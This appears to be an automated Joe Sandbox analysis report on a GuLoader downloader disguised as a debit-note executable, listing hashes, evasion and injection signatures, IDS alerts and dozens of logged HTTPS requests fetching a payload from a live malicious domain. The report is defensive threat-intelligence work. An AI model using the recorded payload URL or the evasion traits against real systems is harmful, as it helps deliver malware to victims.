Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
debit-note-19-08-dn-2024.exe

Overview

General Information

Sample name:debit-note-19-08-dn-2024.exe
Analysis ID:1499056
MD5:5133f0baa9ab594674eae836fd1491c7
SHA1:389ab5a5e7ed520406265e0a1adc14d5ff478c4a
SHA256:e13fd3d42fb6c63fcf7780701282f760bd4aaa6ad1cdb55cc586e1aca8caaf2a
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • debit-note-19-08-dn-2024.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe" MD5: 5133F0BAA9AB594674EAE836FD1491C7)
    • debit-note-19-08-dn-2024.exe (PID: 5076 cmdline: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe" MD5: 5133F0BAA9AB594674EAE836FD1491C7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: debit-note-19-08-dn-2024.exe PID: 5816JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    Timestamp:2024-08-26T15:35:12.874627+0200
    SID:2803270
    Severity:2
    Source Port:49834
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:36:58.028571+0200
    SID:2803270
    Severity:2
    Source Port:49844
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:38:22.106211+0200
    SID:2803270
    Severity:2
    Source Port:49852
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:32:24.398809+0200
    SID:2803270
    Severity:2
    Source Port:49818
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:34:20.207005+0200
    SID:2803270
    Severity:2
    Source Port:49829
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:35:33.923133+0200
    SID:2803270
    Severity:2
    Source Port:49836
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:35:44.422795+0200
    SID:2803270
    Severity:2
    Source Port:49837
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:39:14.576936+0200
    SID:2803270
    Severity:2
    Source Port:49857
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:35:23.403637+0200
    SID:2803270
    Severity:2
    Source Port:49835
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:37:08.534612+0200
    SID:2803270
    Severity:2
    Source Port:49845
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:38:01.116261+0200
    SID:2803270
    Severity:2
    Source Port:49850
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:33:48.667089+0200
    SID:2803270
    Severity:2
    Source Port:49826
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:38:32.606941+0200
    SID:2803270
    Severity:2
    Source Port:49853
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:33:06.530531+0200
    SID:2803270
    Severity:2
    Source Port:49822
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:38:11.609384+0200
    SID:2803270
    Severity:2
    Source Port:49851
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:40:17.503268+0200
    SID:2803270
    Severity:2
    Source Port:49863
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:33:59.198908+0200
    SID:2803270
    Severity:2
    Source Port:49827
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:34:41.251146+0200
    SID:2803270
    Severity:2
    Source Port:49831
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:34:51.795578+0200
    SID:2803270
    Severity:2
    Source Port:49832
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:39:46.050297+0200
    SID:2803270
    Severity:2
    Source Port:49860
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:35:54.951763+0200
    SID:2803270
    Severity:2
    Source Port:49838
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:35:02.339615+0200
    SID:2803270
    Severity:2
    Source Port:49833
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:32:13.887224+0200
    SID:2803270
    Severity:2
    Source Port:49817
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:36:16.007629+0200
    SID:2803270
    Severity:2
    Source Port:49840
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:37:40.083784+0200
    SID:2803270
    Severity:2
    Source Port:49848
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:37:19.045815+0200
    SID:2803270
    Severity:2
    Source Port:49846
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:38:53.610245+0200
    SID:2803270
    Severity:2
    Source Port:49855
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:33:27.613907+0200
    SID:2803270
    Severity:2
    Source Port:49824
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:33:38.137307+0200
    SID:2803270
    Severity:2
    Source Port:49825
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:34:30.714559+0200
    SID:2803270
    Severity:2
    Source Port:49830
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:38:43.103485+0200
    SID:2803270
    Severity:2
    Source Port:49854
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:39:56.534029+0200
    SID:2803270
    Severity:2
    Source Port:49861
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:32:56.006587+0200
    SID:2803270
    Severity:2
    Source Port:49821
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:37:50.616639+0200
    SID:2803270
    Severity:2
    Source Port:49849
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:32:45.444692+0200
    SID:2803270
    Severity:2
    Source Port:49820
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:36:37.019872+0200
    SID:2803270
    Severity:2
    Source Port:49842
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:39:35.568493+0200
    SID:2803270
    Severity:2
    Source Port:49859
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:39:04.092538+0200
    SID:2803270
    Severity:2
    Source Port:49856
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:37:29.555095+0200
    SID:2803270
    Severity:2
    Source Port:49847
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:32:34.915709+0200
    SID:2803270
    Severity:2
    Source Port:49819
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:40:07.011871+0200
    SID:2803270
    Severity:2
    Source Port:49862
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:36:26.512491+0200
    SID:2803270
    Severity:2
    Source Port:49841
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:36:47.515652+0200
    SID:2803270
    Severity:2
    Source Port:49843
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:39:25.088601+0200
    SID:2803270
    Severity:2
    Source Port:49858
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:34:09.694079+0200
    SID:2803270
    Severity:2
    Source Port:49828
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:33:17.068405+0200
    SID:2803270
    Severity:2
    Source Port:49823
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic
    Timestamp:2024-08-26T15:36:05.482829+0200
    SID:2803270
    Severity:2
    Source Port:49839
    Destination Port:443
    Protocol:TCP
    Classtype:Potentially Bad Traffic

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://gitak.top/KGukxUu155.bin~5Avira URL Cloud: Label: malware
    Source: https://gitak.top/Avira URL Cloud: Label: malware
    Source: https://gitak.top/mAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bincyAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binificateChainPolicyAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin/uAvira URL Cloud: Label: malware
    Source: https://gitak.top/uAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binRAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binkAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binlAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin/KGukxUu155.binAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binmAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin/aAvira URL Cloud: Label: malware
    Source: https://gitak.top/aAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binID=Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin)Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin#Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bineAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin/mAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin_Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bino(Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin:Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binaAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binuAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin?oAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin0Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin~53Avira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.binurTAvira URL Cloud: Label: malware
    Source: https://gitak.top/KGukxUu155.bin/Avira URL Cloud: Label: malware
    Source: debit-note-19-08-dn-2024.exeReversingLabs: Detection: 50%
    Source: debit-note-19-08-dn-2024.exeJoe Sandbox ML: detected
    Source: debit-note-19-08-dn-2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49817 version: TLS 1.2
    Source: debit-note-19-08-dn-2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
    Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49819 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49820 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49817 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49818 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49821 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49822 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49834 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49828 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49833 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49823 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49827 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49826 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49844 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49824 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49835 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49840 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49839 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49832 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49856 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49825 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49831 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49841 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49837 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49842 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49851 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49829 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49830 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49848 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49859 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49860 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49843 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49836 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49845 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49854 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49862 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49852 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49838 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49846 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49858 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49847 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49849 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49863 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49850 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49853 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49855 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49857 -> 172.67.207.219:443
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49861 -> 172.67.207.219:443
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
